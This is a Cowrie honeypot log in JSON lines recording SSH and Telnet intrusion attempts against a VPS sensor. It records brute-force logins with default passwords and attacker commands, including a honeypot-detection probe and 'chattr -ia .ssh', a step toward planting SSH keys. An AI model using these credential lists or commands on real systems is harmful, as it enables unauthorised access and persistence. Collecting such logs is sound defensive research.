{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:36:41.217309Z","src_ip":"77.90.185.47","session":"a8814181ca7c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T10:36:41.836100Z","src_ip":"77.90.185.47","session":"a8814181ca7c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:36:43.029121Z","src_ip":"77.90.185.47","session":"a8814181ca7c"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:36:56.036079Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33110,"dst_ip":"1.2.3.4","dst_port":22,"session":"64f7c8d6228f","protocol":"ssh","message":"New connection: 212.227.125.160:33110 (1.2.3.4:22) [session: 64f7c8d6228f]","sensor":"my-vps","timestamp":"2025-08-28T10:37:22.182345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:37:22.200296Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:37:22.264725Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1122","message":"login attempt [ubnt/1122] failed","sensor":"my-vps","timestamp":"2025-08-28T10:37:22.636711Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt1234","message":"login attempt [ubnt/ubnt1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:37:23.718694Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"fA0fO5gQ8bJ7rJ9","message":"login attempt [ubnt/fA0fO5gQ8bJ7rJ9] failed","sensor":"my-vps","timestamp":"2025-08-28T10:37:24.800842Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin123","message":"login attempt [ubnt/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:37:25.884314Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"","message":"login attempt [ubnt/] failed","sensor":"my-vps","timestamp":"2025-08-28T10:37:26.967049Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:37:28.050792Z","src_ip":"212.227.125.160","session":"64f7c8d6228f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54202,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0c9efd8feea","protocol":"ssh","message":"New connection: 217.72.205.35:54202 (1.2.3.4:22) [session: c0c9efd8feea]","sensor":"my-vps","timestamp":"2025-08-28T10:37:47.292280Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:37:47.293375Z","src_ip":"217.72.205.35","session":"c0c9efd8feea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b08874ac5f7","protocol":"ssh","message":"New connection: 212.227.235.229:51824 (1.2.3.4:22) [session: 5b08874ac5f7]","sensor":"my-vps","timestamp":"2025-08-28T10:38:44.331945Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:38:44.421284Z","src_ip":"212.227.235.229","session":"5b08874ac5f7"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:40:39.207916Z","src_ip":"212.227.235.229","session":"ba705cb18b6b"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.207.211","src_port":39032,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b6ddfaed7d7","protocol":"ssh","message":"New connection: 116.198.207.211:39032 (1.2.3.4:22) [session: 7b6ddfaed7d7]","sensor":"my-vps","timestamp":"2025-08-28T10:40:55.491545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:40:55.493297Z","src_ip":"116.198.207.211","session":"7b6ddfaed7d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:40:55.696200Z","src_ip":"116.198.207.211","session":"7b6ddfaed7d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37256,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ff39d4ecd93","protocol":"ssh","message":"New connection: 212.227.235.229:37256 (1.2.3.4:22) [session: 0ff39d4ecd93]","sensor":"my-vps","timestamp":"2025-08-28T10:41:02.677595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:41:02.732520Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55119,"dst_ip":"1.2.3.4","dst_port":23,"session":"0ca780169e91","protocol":"telnet","message":"New connection: 212.227.235.229:55119 (1.2.3.4:23) [session: 0ca780169e91]","sensor":"my-vps","timestamp":"2025-08-28T10:41:02.778748Z"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T10:41:02.910506Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.login.success","username":"root","password":"ADmin123","message":"login attempt [root/ADmin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:41:03.780510Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:41:04.668694Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.669397Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.670014Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.671905Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.672679Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.673834Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.674785Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.675609Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.676252Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.677179Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.678271Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.863356Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.864308Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:41:04.865349Z","src_ip":"212.227.235.229","session":"0ff39d4ecd93"}
{"eventid":"cowrie.session.closed","duration":31.302578687667847,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:41:34.081234Z","src_ip":"212.227.235.229","session":"0ca780169e91"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":4684,"dst_ip":"1.2.3.4","dst_port":22,"session":"521b6e085327","protocol":"ssh","message":"New connection: 186.225.142.90:4684 (1.2.3.4:22) [session: 521b6e085327]","sensor":"my-vps","timestamp":"2025-08-28T10:42:23.096954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:42:23.338156Z","src_ip":"186.225.142.90","session":"521b6e085327"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:42:23.338948Z","src_ip":"186.225.142.90","session":"521b6e085327"}
{"eventid":"cowrie.login.success","username":"root","password":"0R968JI9UFJ6","message":"login attempt [root/0R968JI9UFJ6] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:42:25.862207Z","src_ip":"186.225.142.90","session":"521b6e085327"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:42:26.946818Z","src_ip":"186.225.142.90","session":"521b6e085327"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T10:42:26.947494Z","src_ip":"186.225.142.90","session":"521b6e085327"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:42:27.442267Z","src_ip":"186.225.142.90","session":"521b6e085327"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:42:28.030475Z","src_ip":"186.225.142.90","session":"521b6e085327"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37714,"dst_ip":"1.2.3.4","dst_port":22,"session":"11446fdd0516","protocol":"ssh","message":"New connection: 212.227.235.229:37714 (1.2.3.4:22) [session: 11446fdd0516]","sensor":"my-vps","timestamp":"2025-08-28T10:42:39.243218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:42:39.245609Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:42:39.495690Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.login.success","username":"root","password":"123456abcd","message":"login attempt [root/123456abcd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:42:42.539980Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:42:43.065500Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:42:43.066301Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:42:43.067379Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:42:43.318422Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:42:55.505422Z","src_ip":"116.198.207.211","session":"7b6ddfaed7d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43328,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ba14e194c3f","protocol":"ssh","message":"New connection: 212.227.235.229:43328 (1.2.3.4:22) [session: 1ba14e194c3f]","sensor":"my-vps","timestamp":"2025-08-28T10:42:55.575341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:42:55.575966Z","src_ip":"212.227.235.229","session":"1ba14e194c3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:42:55.810129Z","src_ip":"212.227.235.229","session":"1ba14e194c3f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:42:57.460447Z","src_ip":"212.227.235.229","session":"1ba14e194c3f"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":55772,"dst_ip":"1.2.3.4","dst_port":22,"session":"67384f040e79","protocol":"ssh","message":"New connection: 139.19.117.131:55772 (1.2.3.4:22) [session: 67384f040e79]","sensor":"my-vps","timestamp":"2025-08-28T10:43:08.308532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:43:08.309349Z","src_ip":"139.19.117.131","session":"67384f040e79"}
